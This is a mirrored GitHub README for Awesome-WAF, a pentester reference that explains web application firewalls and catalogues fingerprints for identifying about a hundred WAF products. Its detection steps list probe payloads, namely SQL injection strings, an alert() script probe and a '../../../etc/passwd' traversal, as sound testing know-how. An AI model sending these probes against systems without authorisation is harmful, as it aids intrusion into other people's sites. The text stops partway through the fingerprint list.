https://github.com/0xInfection/Awesome-WAF
🔥 Web-application firewalls (WAFs) from security standpoint.
https://github.com/0xInfection/Awesome-WAF
List: Awesome-WAF
awesome awesome-list bypass-waf firewall infosec security waf waf-bypass waf-detection waf-fingerprints waf-test waf-testing web-application-firewall
Last synced: about 1 year ago
JSON representation
🔥 Web-application firewalls (WAFs) from security standpoint.
- Host: GitHub
- URL: https://github.com/0xInfection/Awesome-WAF
- Owner: 0xInfection
- License: apache-2.0
- Created: 2019-01-08T04:57:06.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2024-10-28T06:44:26.000Z (over 1 year ago)
- Last Synced: 2025-03-18T00:08:20.538Z (about 1 year ago)
- Topics: awesome, awesome-list, bypass-waf, firewall, infosec, security, waf, waf-bypass, waf-detection, waf-fingerprints, waf-test, waf-testing, web-application-firewall
- Language: Python
- Homepage:
- Size: 29.1 MB
- Stars: 6,551
- Watchers: 254
- Forks: 1,083
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
- Contributing: CONTRIBUTING.md
- License: LICENSE
- Code of conduct: CODE_OF_CONDUCT.md
Awesome Lists containing this project
- awesome-cybersec - Everything about web application firewalls (WAFs)
- StarryDivineSky - 0xInfection/Awesome-WAF
- ultimate-awesome - Awesome-WAF - Everything about Web Application Firewalls (WAFs) from Security Standpoint! 🔥. (Other Lists / TeX Lists)
- awesome-hacking-lists - 0xInfection/Awesome-WAF - 🔥 Web-application firewalls (WAFs) from security standpoint. (Python)
- super-awesome - 0xInfection/Awesome-WAF
- awesome - 0xInfection/Awesome-WAF - Everything about Web Application Firewalls (WAFs) from Security Standpoint! 🔥 (Python)
README
# Awesome WAF [](https://github.com/0xinfection/awesome-waf)
Everything about web application firewalls (WAFs) from a security perspective. 🔥
>
> __Foreword:__ This was originally my own collection on WAFs. I am open-sourcing it in the hope that it will be useful for pentesters and researchers out there.As the saying goes, "the community just learns from each other."

__A Concise Definition:__ A firewall is a security policy enforcement point positioned between a web application and the client endpoint. This functionality can be implemented in software or hardware, running in an appliance device, or in a typical server running a common operating system. It may be a stand-alone device or integrated into other network components. *(Source: [PCI DSS IS 6.6](https://www.pcisecuritystandards.org/documents/information_supplement_6.6.pdf))*
A web-application firewall sits between a user and a webapp and is tasked to prevent any malicious activity from reaching the webapp. A WAF either filters out the malicious part of the request or just simply blocks it.
Feel free to [contribute](CONTRIBUTING.md).
### Contents:
- [Introduction](#introduction)
- [How WAFs Work](#how-wafs-work)
- [Operation Modes](#operation-modes)
- [Testing Methodology](#testing-methodology)
- [Where To Look](#where-to-look)
- [Detection Techniques](#detection-techniques)
- [WAF Fingerprints](#waf-fingerprints)
- [Evasion Techniques](#evasion-techniques)
- [Fuzzing/Bruteforcing](#fuzzingbruteforcing)
- [Regex Reversing](#regex-reversing)
- [Obfuscation/Encoding](#obfuscation)
- [Browser Bugs](#browser-bugs)
- [HTTP Header Spoofing](#request-header-spoofing)
- [Google Dorks Approach](#google-dorks-approach)
- [Known Bypasses](#known-bypasses)
- [Awesome Tooling](#awesome-tools)
- [Fingerprinting](#fingerprinting)
- [Testing](#testing)
- [Evasion](#evasion)
- [Blogs & Writeups](#blogs-and-writeups)
- [Video Presentations](#video-presentations)
- [Research Presentations & Papers](#presentations--research-papers)
- [Research Papers](#research-papers)
- [Presentation Slides](#presentations)
- [Licensing & Credits](#credits--license)
## Introduction:
### How WAFs Work:
- Using a set of rules to distinguish between normal requests and malicious requests.
- Sometimes they use a learning mode to add rules automatically through learning about user behaviour.
### Operation Modes:
- __Negative Model (Blacklist based)__ - A blacklisting model uses pre-set signatures to block requests that are clearly malicious. The signatures of WAFs operating in a negative model are specifically crafted to prevent attacks which exploit certain web application vulnerabilities. Blacklisting model web application firewalls are a great choice for web applications exposed to the public internet and are highly effective against major vulnerabilities. Eg. Rule for blocking all `*` inputs prevent basic cross-site scripting attacks.
- __Positive Model (Whitelist based)__ - A whitelisting model only allows web traffic according to specifically configured criteria. For example, it can be configured to only allow HTTP GET requests from certain IP addresses. This model can be very effective for blocking potential large scale attacks, but will also block a lot of legitimate traffic. Whitelisting model firewalls are probably best for web applications on an internal network that are designed to be used by only a limited group of people, such as employees.
- __Mixed/Hybrid Model (Inclusive model)__ - A hybrid security model blends both whitelisting and blacklisting. Depending on all sorts of configuration specifics, hybrid firewalls could be the best choice for both web applications on internal networks and web applications on the public internet. A good scenario can be when web-application is facing the public internet (use blacklists) while the admin panel needs to be exposed to only a subset of users (use whitelists).
## Testing Methodology:
### Where To Look:
- Always look out for common ports that expose that a WAF, namely `80`, `443`, `8000`, `8080` and `8888` ports. However, its important to note that a WAF can be easily deployed on any port running a HTTP service. It is good to enumerate HTTP service ports first hand and then look for WAFs.
- Some WAFs set their own cookies in requests (e.g. Citrix Netscaler, Yunsuo WAF).
- Some associate themselves with separate headers (e.g. Anquanbao WAF, Amazon AWS WAF).
- Some often alter headers and jumble characters to confuse attacker (e.g. Netscaler, Big-IP).
- Some expose themselves in the `Server` header (e.g. Approach, WTS WAF).
- Some WAFs expose themselves in the response content (e.g. DotDefender, Armor, Sitelock).
- Other WAFs reply with unusual response codes upon malicious requests (e.g. WebKnight, 360 WAF).
### Detection Techniques:
To identify WAFs, we need to (dummy) provoke it.
1. Make a normal GET request from a browser, intercept and record response headers (specifically cookies).
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
3. Make GET requests to random open ports and grab banners which might expose the WAFs identity.
4. On login pages, inject common (easily detectable) payloads like `" or 1 = 1 --`.
5. Inject noisy payloads like `alert()` into search bars, contact forms and other input fields.
6. Attach a dummy `../../../etc/passwd` to a random parameter at end of URL.
7. Append some catchy keywords like `' OR SLEEP(5) OR '` at end of URLs to any random parameter.
8. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
9. Many a times, the WAF varies the `Server` header upon different types of interactions.
10. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
11. Side Channel Attacks - Examine the timing behaviour of the request and response content.
> __Tip:__ More details can be found in a [blogpost here](https://0xinfection.github.io/posts/fingerprinting-wafs-side-channel/).
## WAF Fingerprints
Wanna fingerprint WAFs? Lets see how.
> __NOTE__: This section contains manual WAF detection techniques. You might want to switch over to [next section](#evasion-techniques).
WAF
Fingerprints
360
-
Detectability: Easy - Detection Methodology:
- Returns status code
493upon unusual requests. - Blockpage may contain reference to
wzws-waf-cgi/directory. - Blocked response page source may contain:
- Reference to
wangshan.360.cnURL. -
Sorry! Your access has been intercepted because your links may threaten website security.text snippet.
- Reference to
- Response headers may contain
X-Powered-By-360WZBheader. - Blocked response headers contain unique header
WZWS-Ray. -
Serverheader may contain valueqianxin-waf.
aeSecure
-
Detectability: Moderate - Detection Methodology:
- Blocked response content contains
aesecure_denied.pngimage (view source to see). - Response headers contain
aeSecure-codevalue.
Airlock
-
Detectability: Moderate/Difficult - Detection Methodology:
-
Set-Cookieheaders may contain: -
AL-SESScookie field name (case insensitive). -
AL-LBvalue (case insensitive). - Blocked response page contains:
-
Server detected a syntax error in your requesttext. -
Check your request and all parameterstext snippet.
AlertLogic
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains:
-
We are sorry, but the page you are looking for cannot be foundtext snippet. -
The page has either been removed, renamed or temporarily unavailabletext. -
404 Not Foundin red letters.
Aliyundun
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains:
-
Sorry, your request has been blocked as it may cause potential threats to the server's securitytext snippet. - Reference to
errors.aliyun.comsite URL. - Blocked response code returned is
405.
Anquanbao
-
Detectability: Easy - Detection Methodology:
- Returns blocked HTTP response code
405upon malicious requests. - Blocked response content may contain
/aqb_cc/error/orhidden_intercept_time. - Response headers contain
X-Powered-by-Anquanbaoheader field.
Anyu
-
Detectability: Easy - Detection Methodology:
- Blocked response content contains
Sorry! your access has been intercepted by AnYu - Blocked response page contains
AnYu- the green channeltext. - Response headers may contain unusual header
WZWS-RAY.
Approach
-
Detectability: Easy - Detection Methodology:
- Blocked response page content may contain:
-
Approach Web Application Firewall Frameworkheading. -
Your IP address has been logged and this information could be used by authorities to track you.warning. -
Sorry for the inconvenience!keyword. -
Approach infrastructure teamtext snippet. -
Serverheader has field value set toApproach.
Armor Defense
-
Detectability: Easy - Detection Methodology:
- Blocked response content contains:
-
This request has been blocked by website protection from Armortext. -
If you manage this domain please create an Armor support ticketsnippet.
-
ArvanCloud
-
Detectability: Easy - Detection Methodology:
-
Serverheader containsArvanCloudkeyword.
ASPA
-
Detectability: Easy - Detection Methodology:
-
Serverheader containsASPA-WAFkeyword. - Response contain unique header
ASPA-Cache-Statuswith contentHITorMISS.
ASP.NET Generic
-
Detectability: Moderate - Detection Methodology:
- Response headers may contain
X-ASPNET-Versionheader value. - Blocked response page content may contain:
-
This generic 403 error means that the authenticated user is not authorized to use the requested resource. -
Error Code 0x00000000<keyword. -
X-Powered-Byheader has field value set toASP.NET.
Astra
-
Detectability: Easy - Detection Methodology:
- Blocked response page content may contain:
-
Sorry, this is not allowed.inh1. -
our website protection system has detected an issue with your IP address and wont let you proceed any furthertext snippet. - Reference to
www.getastra.com/assets/images/URL. - Response cookies has field value
cz_astra_csrf_cookiein response headers.
AWS ELB
-
Detectability: Moderate - Detection Methodology:
- Response headers might contain:
-
AWSALBcookie field value. -
X-AMZ-IDheader. -
X-AMZ-REQUEST-IDheader.
-
- Response page may contain:
-
Access Deniedin their keyword. - Request token ID with length from 20 to 25 between
RequestIdtag.
-
-
Serverheader field containsawselb/2.0value.
Baidu Yunjiasu
-
Detectability: Moderate - Detection Methodology:
-
Serverheader may containYunjiasu-nginxvalue. -
Serverheader may containYunjiasuvalue.
Barikode
-
Detectability: Easy - Detection Methodology:
- Blocked response page content contains:
-
BARIKODEkeyword. -
Forbidden Accesstext snippet inh1.
-
Barracuda
-
Detectability: Moderate - Detection Methodology:
- Response cookies may contain
barra_counter_sessionvalue. - Response headers may contain
barracuda_keyword. - Response page contains:
-
You have been blockedheading. -
You are unable to access this websitetext.
Bekchy
-
Detectability: Easy - Detection Methodology:
- Blocked response headers contains
Bekchy - Access Denied. - Blocked response page contains reference to
https://bekchy.com/report.
BinarySec
-
Detectability: Moderate - Detection Methodology:
- Response headers contain:
-
X-BinarySec-Viafield. -
X-BinarySec-NoCachefield. -
Serverheader containsBinarySeckeyword.
BitNinja
-
Detectability: Easy - Detection Methodology:
- Blocked response page may contain:
-
Security check by BitNinjatext snippet. -
your IP will be removed from BitNinja. -
Visitor anti-robot validationtext snippet. -
(You will be challenged by a reCAPTCHA page)text.
BIG-IP ASM
-
Detectability: Moderate - Detection Methodology:
- Response headers may contain
BigIPorF5keyword value. - Response header fields may contain
X-WA-Infoheader. - Response headers might have jumbled
X-Cnectionfield value.
BlockDos
-
Detectability: Moderate - Detection Methodology:
-
Serverheader contains valueBlockDos.net.
Bluedon IST
-
Detectability: Easy - Detection Methodology:
-
Serverheader containsBDWAFfield value. - Blocked response page contains to
Bluedon Web Application Firewalltext snippet..
BulletProof Security Pro
-
Detectability: Moderate - Detection Methodology:
- Blocked response page contains:
-
divwith id asbpsMessagetext snippet. -
If you arrived here due to a search or clicking on a link click your Browser's back button to return to the previous page.text snippet.
-
CDN NS Application Gateway
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains
CdnNsWAF Application Gatewaytext snippet.
Cerber (WordPress)
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains:
-
We're sorry, you are not allowed to proceedtext snippet. -
Your request looks suspicious or similar to automated requests from spam posting softwarewarning.
-
Chaitin Safeline
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains
event_idkeyword within HTML comments.
ChinaCache
-
Detectability: Easy - Detection Methodology:
- Response headers contain
Powered-by-ChinaCachefield.
Cisco ACE XML Gateway
-
Detectability: Moderate - Detection Methodology:
-
Serverheader has valueACE XML Gatewayset.
Cloudbric
-
Detectability: Moderate - Detection Methodology:
- Response content contains:
-
Malicious Code Detectedheading. -
Your request was blocked by Cloudbrictext snippet. - Reference to
https://cloudbric.zendesk.comURL.
-
Cloudbric Help Centertext. - Page title starting with
Cloudbric | ERROR!.
Cloudflare
-
Detectability: Easy - Detection Methodology:
- Response headers might have
cf-rayfield value. -
Serverheader field has valuecloudflare. -
Set-Cookieresponse headers have__cfuid=cookie field. - Page content might have
Attention Required!orCloudflare Ray ID:. - Page content may contain
DDoS protection by Cloudflareas text. - You may encounter
CLOUDFLARE_ERROR_500S_BOXupon hitting invalid URLs.
CloudfloorDNS
-
Detectability: Easy - Detection Methodology:
-
Serverheader field has valueCloudfloorDNS WAF. - Block-page title might have
CloudfloorDNS - Web Application Firewall Error. - Page content may contain
www.cloudfloordns.com/contactURL as a contact link.
Cloudfront
-
Detectability: Easy - Detection Methodology:
- Blocked response content contains
Generated by cloudfront (CloudFront)error upon malicious request.
Comodo cWatch
-
Detectability: Easy - Detection Methodology:
-
Serverheader containsProtected by COMODO WAFvalue.
CrawlProtect
-
Detectability: Easy - Detection Methodology:
- Response cookies might contain
crawlprotectcookie name. - Block Page title has
CrawlProtectkeyword in it. - Blocked response content contains value
This site is protected by CrawlProtect !!!upon malicious request.
Deny-All
-
Detectability: Difficult - Detection Methodology:
- Response content contains value
Condition Intercepted. -
Set-Cookieheader contains cookie fieldsessioncookie.
Distil Web Protection
-
Detectability: Easy - Detection Methodology:
- Response headers contain field value
X-Distil-CSin all requests. - Blocked response page contains:
-
Pardon Our Interruption...heading. -
You have disabled javascript in your browser.text snippet. -
Something about your browser made us think that you are a bot.text.
DoSArrest Internet Security
-
Detectability: Easy - Detection Methodology:
- Response headers contain field value
X-DIS-Request-ID. -
Serverheader containsDOSarrestkeyword.
DotDefender
-
Detectability: Easy - Detection Methodology:
- Blocked response content contains value
dotDefender Blocked Your Request. - Blocked response headers contain
X-dotDefender-deniedfield value.
DynamicWeb Injection Check
-
Detectability: Easy - Detection Methodology:
- Blocked response headers contain
X-403-Status-Byfield with valuedw-inj-checkvalue.
e3Learning Security
-
Detectability: Easy - Detection Methodology:
-
Serverheader containse3Learning_WAFkeyword.
EdgeCast (Verizon)
-
Detectability: Easy - Detection Methodology:
- Blocked response content contains value
Please contact the site administrator, and provide the following Reference ID:EdgeCast Web Application Firewall (Verizon). - Blocked response code returns
400 Bad Requeston malicious requests.
Eisoo Cloud
-
Detectability: Easy - Detection Methodology:
- Blocked response page content may contain:
-
/eisoo-firewall-block.cssreference. -
www.eisoo.comURL. -
© (year) Eisoo Inc.keyword. -
Serverheader has field value set toEisooWAF-AZURE/EisooWAF.
Expression Engine
-
Detectability: Difficult - Detection Methodology:
- Blocked response page returns
Invalid URIgenerally. - Blocked response content contains value
Invalid GET Requestupon malicious GET queries. - Blocked POST type queries contain
Invalid Datain response content.
F5 ASM
-
Detectability: Difficult - Detection Methodology:
- Blocked response content contains warning
The requested URL was rejected. Please consult with your administrator.
FortiWeb
-
Detectability: Moderate - Detection Methodology:
- Response headers contain
FORTIWAFSID=on malicious requests. - Blocked response page contains:
- Reference to
.fgd_iconimage icon. -
Server Unavailable!as heading. -
Server unavailable. Please visit later.as text.
GoDaddy
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains value
Access Denied - GoDaddy Website Firewall.
GreyWizard
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains:
-
Grey Wizardas title. -
Contact the website owner or Grey Wizardtext snippet. -
We've detected attempted attack or non standard traffic from your IP addresstext snippet.
-
-
Serverheader containgreywizardkeyword.
Huawei Cloud
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains:
- Reference to
account.hwclouds.com/static/error/images/404img.jpgerror image. - Reference to
www.hwclouds.comURL. - Reference to
hws_security@{site.tld}e-mail for reporting.
HyperGuard
-
Detectability: Difficult - Detection Methodology:
-
Set-Cookieheader has cookie fieldODSESSION=in response headers.
IBM DataPower
-
Detectability: Difficult - Detection Methodology:
- Response headers contains field value value
X-Backside-Transportwith valueOKorFAIL.
Imperva Incapsula
-
Detectability: Easy - Detection Methodology:
- Blocked response page content may contain:
-
Powered By Incapsulatext snippet. -
Incapsula incident IDkeyword. -
_Incapsula_Resourcekeyword. -
subject=WAF Block Pagekeyword. - Normal GET request headers contain
visid_incapvalue. - Response headers may contain
X-Iinfoheader field name. -
Set-Cookieheader has cookie fieldincap_sesandvisid_incap.
Imunify360
-
Detectability: Easy - Detection Methodology:
-
Serverheader containimunify360-webshieldkeyword. - Response page contains:
-
Powered by Imunify360text snippet. -
imunify360 preloaderif response type is JSON. - Blocked response page contains
protected by Imunify360text.
IndusGuard
-
Detectability: Moderate - Detection Methodology:
-
Serverheader contains valueIF_WAF. - Blocked response content contains warning
further investigation and remediation with a screenshot of this page. - Response headers contain a unique header
X-Version.
Instart DX
-
Detectability: Easy - Detection Methodology:
- Response headers contain
X-Instart-Request-IDunique header. - Response headers contain
X-Instart-WLunique header fingerprint. - Response headers contain
X-Instart-Cacheunique header fingerprint. - Blocked response page contains
The requested URL was rejected. Please consult with your administrator.text.
ISA Server
-
Detectability: Difficult - Detection Methodology:
- Response page contains:
-
The ISA Server denied the specified Uniform Resource Locator (URL)text snippet. -
The server denied the specified Uniform Resource Locator (URL). Contact the server administrator.text snippet
Janusec Application Gateway
-
Detectability: Easy - Detection Methodology:
- Blocked response page has image displaying
JANUSECname and logo. - Blocked response page displays
Janusec Application Gatewayon malicious requests.
Jiasule
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains reference to
static.jiasule.com/static/js/http_error.jsURL. -
Set-Cookieheader has cookie field__jsluid=orjsl_trackingin response headers. -
Serverheader hasjiasule-WAFkeywords. - Blocked response content has
notice-jiasulekeyword.
KeyCDN
-
Detectability: Easy - Detection Methodology:
-
Serverheader containsKeyCDNkeyword.
KnownSec
-
Detectability: Easy - Detection Methodology:
- Blocked response page displays
ks-waf-error.pngimage (view source to see).
KONA Site Defender (Akamai)
-
Detectability: Easy - Detection Methodology:
-
Serverheader containsAkamaiGHostkeyword.
LiteSpeed
-
Detectability: Easy - Detection Methodology:
-
Serverheader has value set toLiteSpeed. Response page contains:-
Proudly powered by LiteSpeed Web Servertext. - Reference to
http://www.litespeedtech.com/error-page Access to resource on this server is denied.
Malcare
-
Detectability: Moderate - Detection Methodology:
- Blocked response page may contains:
-
Blocked because of Malicious Activitiestext snippet. -
Firewall powered by MalCaretext snippet.
-
MissionControl Application Shield
-
Detectability: Easy - Detection Methodology:
-
Serverheader field containsMission Control Application Shieldvalue.
ModSecurity
-
Detectability: Moderate/Difficult - Detection Methodology:
- Blocked response page contains:
-
This error was generated by Mod_Securitytext snippet. -
One or more things in your request were suspicioustext snippet. -
rules of the mod_security moduletext snippet. -
mod_security rules triggeredtext snippet. - Reference to
/modsecurity-errorpage/directory. -
Serverheader may containMod_SecurityorNYOBkeywords. - Sometimes, the response code to an attack is
403while the response phrase isModSecurity Action.
ModSecurity CRS
-
Detectability: Difficult - Detection Methodology:
- Blockpage occurs on adding a separate request header
X-Scannerwhen set to a particular paranoa level.
NAXSI
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains
This Request Has Been Blocked By NAXSI. - Response headers contain unusual field
X-Data-Originwith valuenaxsi/wafkeyword. -
Serverheader containsnaxsi/wafkeyword value. - Blocked response page may contain
NAXSI blocked informationerror code.
Nemesida
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains
Suspicious activity detected. Access to the site is blocked.. - Contains reference to email
nwaf@{site.tld}
Netcontinuum
-
Detectability: Moderate - Detection Methodology:
- Session cookies contain
NCI__SessionId=cookie field name.
NetScaler AppFirewall
-
Detectability: Moderate - Detection Methodology:
- Response headers may contain
-
Connection:header field name jumbled tonnCoection: -
ns_af=cookie field name. -
citrix_ns_idfield name. -
NSC_keyword. -
NS-CACHEfield value.
NevisProxy
-
Detectability: Moderate - Detection Methodology:
- Response header cookies contain
Navajokeyword.
NewDefend
-
Detectability: Easy - Detection Methodology:
- Response page contains:
- Reference to
http://www.newdefend.com/feedback/misinformation/URL. - Reference to
/nd_block/directory. -
Serverheader containsNewDefendkeyword.
Nexusguard
-
Detectability: Easy - Detection Methodology:
- Blocked response page has reference to
speresources.nexusguard.com/wafpage/index.htmlURL.
NinjaFirewall
-
Detectability: Moderate - Detection Methodology:
- Response page title contains
NinjaFirewall: 403 Forbidden. - Response page contains:
-
For security reasons, it was blocked and loggedtext snippet. -
NinjaFirewallkeyword in title.
-
- Returns a
403 Forbiddenresponse upon malicious requests.
NSFocus
-
Detectability: Easy - Detection Methodology:
-
Serverheader containNSFocuskeyword.
NullDDoS
-
Detectability: Easy - Detection Methodology:
-
Serverheader contains theNullDDoS Systemkeyword.
onMessage Shield
-
Detectability: Easy - Detection Methodology:
- Response headers contain header
X-Enginefield with valueonMessage Shield. - Blocked response page contains:
-
Blackbaud K-12 conducts routine maintenancekeyword. -
This site is protected by an enhanced security system. - Reference to
https://status.blackbaud.comURL. - Reference to
https://maintenance.blackbaud.comURL.
OpenResty Lua WAF
-
Detectability: Easy - Detection Methodology:
-
Serverheader containsopenresty/{version}keyword. - Blocked response page contains
openresty/{version}text. - Blocked response code returned is
406 Not Acceptable.
Palo Alto
-
Detectability: Moderate - Detection Methodology:
- Blocked response page contains
Virus/Spyware Download Blocked. - Response page might contain
Palo Alto Next Generation Security Platformtext snippet.
PentaWAF
-
Detectability: Easy - Detection Methodology:
-
Serverheader containsPentaWAF/{version}keyword. - Blocked response page contains text
PentaWAF/{version}.
PerimeterX
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains reference to
https://www.perimeterx.com/whywasiblockedURL.
pkSecurityModule IDS
-
Detectability: Moderate - Detection Methodology:
- Response content may contain
-
pkSecurityModule: Security.Alert. -
A safety critical request was discovered and blockedtext snippet.
Positive Technologies Application Firewall
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains
Forbiddeninh1followed by: -
Request ID:in formatyyyy-mm-dd-hh-mm-ss-{ref. code}
PowerCDN
-
Detectability: Moderate - Detection Methodology:
- Response headers may contain
-
Viaheader with contentpowercdn.com. -
X-Cacheheader with contentpowercdn.com. -
X-CDNheader with contentPowerCDN.
Profense
-
Detectability: Easy - Detection Methodology:
-
Set-Cookieheaders containPLBSID=cookie field name. -
Serverheader containProfensekeyword.
Proventia (IBM)
-
Detectability: Difficult - Detection Methodology:
- Blocked response page might contain to
request does not match Proventia rulestext snippet.
Puhui
-
Detectability: Easy - Detection Methodology:
-
Serverheader containPuhuiWAFkeyword.
Qiniu CDN
-
Detectability: Easy - Detection Methodology:
- Response content may contain
- Response headers contain unusual header
X-Qiniu-CDNwith value set to either0or1.
Radware Appwall
-
Detectability: Moderate - Detection Methodology:
- Response page contains the following text snippet:
Unauthorized Activity Has Been Detected.andCase Number - Blocked response page has reference to
radwarealerting@{site.tld}email. - Blocked response page has title set to
Unauthorized Request Blocked. - Response headers may contain
X-SL-CompStateheader field name.
Reblaze
-
Detectability: Moderate - Detection Methodology:
- Cookies in response headers contain
rbzid=header field name. -
Serverfield value might containReblaze Secure Web Gatewaytext snippet. - Response page contains:
-
Access Denied (403)in bold. -
Current session has been terminatedtext. -
For further information, do not hesitate to contact us.
Request Validation Mode
-
Detectability: Easy - Detection Methodology:
- A firewall found specifically on ASP.NET websites and none others.
- Response page contains either of the following text snippet:
ASP.NET has detected data in the request that is potentially dangerous.Request Validation has detected a potentially dangerous client input value.HttpRequestValidationException.- Blocked response code returned is always
500 Internal Error.
RSFirewall
-
Detectability: Easy - Detection Methodology:
- Response page contains:
-
COM_RSFIREWALL_403_FORBIDDENkeyword. -
COM_RSFIREWALL_EVENTkeyword.
Sabre
-
Detectability: Easy - Detection Methodology:
- Returns status code
500 Internal Errorupon malicious requests. - Response content has:
- Contact email
dxsupport@sabre.com. -
Your request has been blockedbold warning. -
clicking the above email link will automatically add some important details to the email for us to investigate the problemtext snippet.
- Contact email
Safe3
-
Detectability: Easy - Detection Methodology:
- Response headers contain:
-
X-Powered-Byheader has field valueSafe3WAF. -
Serverheader contains field value set toSafe3 Web Firewall. - Response page contains
Safe3wafkeyword.
SafeDog
-
Detectability: Easy/Moderate - Detection Methodology:
-
Serverheader in response may contain: -
WAF/2.0keyword. -
safedogfield value.
SecKing
-
Detectability: Easy/Moderate - Detection Methodology:
-
Serverheader in response may contain: -
SECKINGWAFkeyword. -
SECKING/{version}field value.
SecuPress
-
Detectability: Easy - Detection Methodology:
- Response content may contain:
-
SecuPressas text. -
Block ID: Bad URL Contentsas text. - Response code returned is
503 Service Unavailable.
Secure Entry
-
Detectability: Easy - Detection Methodology:
-
Serverheader contains value set toSecure Entry Server.
SecureIIS
-
Detectability: Easy - Detection Methodology:
- Response page contains either of the following text snippet:
- Image displaying
beyondtrustlogo. Download SecureIIS Personal Edition- Reference to
http://www.eeye.com/SecureIIS/URL. -
SecureIIS Errortext snippet.
SecureSphere
-
Detectability: Difficult - Detection Methodology:
- Response page contains the following text snippet:
- Error in
h2text. - Title contains only text as
Error. -
Contact support for additional information.text.
SEnginx
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains
SENGINX-ROBOT-MITIGATIONkeyword.
ServerDefender VP
-
Detectability: Easy - Detection Methodology:
- Blocked response contains
X-Pintheader field withp80keyword.
Shadow Daemon
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains
request forbidden by administrative rules.keyword.
ShieldSecurity
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains:
-
You were blocked by the Shield.text. -
Something in the URL, Form or Cookie data wasn't appropriatetext snippet. -
Warning: You have {number} remaining transgression(s) against this site. -
Seriously stop repeating what you are doing or you will be locked out.
-
SiteGround
-
Detectability: Difficult - Detection Methodology:
- Blocked response page contains
The page you are trying to access is restricted due to a security ruletext snippet.
SiteGuard (JP Secure)
-
Detectability: Difficult - Detection Methodology:
- Response page contains:
-
Powered by SiteGuardtext snippet. -
The server refuse to browse the page.text snippet. The URL may not be correct. Please confirm the value.
-
SiteLock TrueShield
-
Detectability: Easy - Detection Methodology:
- Blocked response page source contains the following:
- Reference to
www.sitelock.comURL. -
Sitelock is leader in Business Website Security Services.text. -
sitelock-site-verificationkeyword. -
sitelock_shield_logoimage.
SonicWall
-
Detectability: Easy - Detection Methodology:
-
Serverheader containSonicWALLkeyword value. - Blocked response page contains either of the following text snippet:
- Image displaying
Delllogo. This request is blocked by the SonicWALL.-
Web Site Blockedtext snippet. -
nsa_banneras keyword. :p
Sophos UTM
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains
Powered by UTM Web Protectionkeyword.
SquareSpace
-
Detectability: Difficult - Detection Methodology:
- Response code returned is
404 Not Foundupon malicious requests. - Blocked response page contains either of the following text snippet:
-
BRICK-50keyword. -
404 Not Foundtext snippet.
SquidProxy IDS
-
Detectability: Easy - Detection Methodology:
-
Serverheader contains field valuesquid/{version}. - Blocked response page contains
Access control configuration prevents your request from being allowed at this time..
StackPath
-
Detectability: Easy - Detection Methodology:
- Contains image displaying
StackPathlogo. - Blocked response page contains
You performed an action that triggered the service and blocked your request.
Stingray
-
Detectability: Difficult - Detection Methodology:
- Blocked response code returns
403 Forbiddenor500 Internal Error. - Response headers contain the
X-Mappingheader field name.
Sucuri CloudProxy
-
Detectability: Easy - Detection Methodology:
- Response headers may contain
SucuriorCloudproxykeywords. - Blocked response page contains the following text snippet:
-
Access Denied - Sucuri Website Firewalltext. - Reference to
https://sucuri.net/privacy-policyURL. - Sometimes the email
cloudproxy@sucuri.net. - Contains copyright notice
;copy {year} Sucuri Inc. - Response headers contains
X-Sucuri-IDheader along with normal requests.
Synology Cloud
-
Detectability: Easy - Detection Methodology:
- Blocked response page has
Copyright (c) 2019 Synology Inc. All rights reserved.as text.
Tencent Cloud
-
Detectability: Moderate - Detection Methodology:
- Blocked response code returns
405 Method Not Allowederror. - Blocked response page contains reference to
waf.tencent-cloud.comURL.
Teros
-
Detectability: Difficult - Detection Methodology:
- Response headers contain cookie field
st8id.
TrafficShield
-
Detectability: Moderate - Detection Methodology:
-
Servermight containF5-TrafficShieldkeyword. -
ASINFO=value might be detected in response cookies.
TransIP
-
Detectability: Easy - Detection Methodology:
- Response headers contain unique header
X-TransIP-Backend. - Response headers contain another header
X-TransIP-Balancer.
UCloud UEWaf
-
Detectability: Easy - Detection Methodology:
- Response content might contain:
- Reference to
/uewaf_deny_pages/default/img/inurl directory. -
ucloud.cnURL.
- Reference to
- Response headers returned has
Serverheader set touewaf/{version}.
URLMaster SecurityCheck
-
Detectability: Moderate - Detection Methodology:
- Response headers might contain:
-
UrlMasterkeyword. -
UrlRewriteModulekeyword. -
SecurityCheckkeyword.
-
- Blocked response code returned is
400 Bad Requesttext snippet.
URLScan
-
Detectability: Moderate - Detection Methodology:
-
- Blocked response page contains:
-
Rejected-by-URLScantext snippet. -
Server Erro in Applicationas heading. -
Module: IIS Web Corein table.
USP Secure Entry
-
Detectability: Moderate - Detection Methodology:
- Response headers contain
Secure Entry Serverfield value.
Varnish (OWASP)
-
Detectability: Easy - Detection Methodology:
- Malicious request returns
404 Not FoundError. - Response page contains:
-
Request rejected by xVarnish-WAFtext snippet.
Varnish CacheWall
-
Detectability: Easy - Detection Methodology:
- Response page contains:
-
Error 403 Naughty, not Nice!as heading. -
Varnish cache Serveras text.
Viettel
-
Detectability: Easy - Detection Methodology:
- Response page contains:
- Block page has title set to
Access denied · Viettel WAF. - Reference to
https://cloudrity.com.vn/URL. - Response page contains keywords
Viettel WAF system. - Contact information reference to
https://cloudrity.com.vn/customer/#/contactURL.
VirusDie
-
Detectability: Easy - Detection Methodology:
- Response page contains:
-
http://cdn.virusdie.ru/splash/firewallstop.pngpicture. -
copy; Virusdie.rucopyright notice. - Response page title contains
Virusdiekeyword. - Page metadata contains
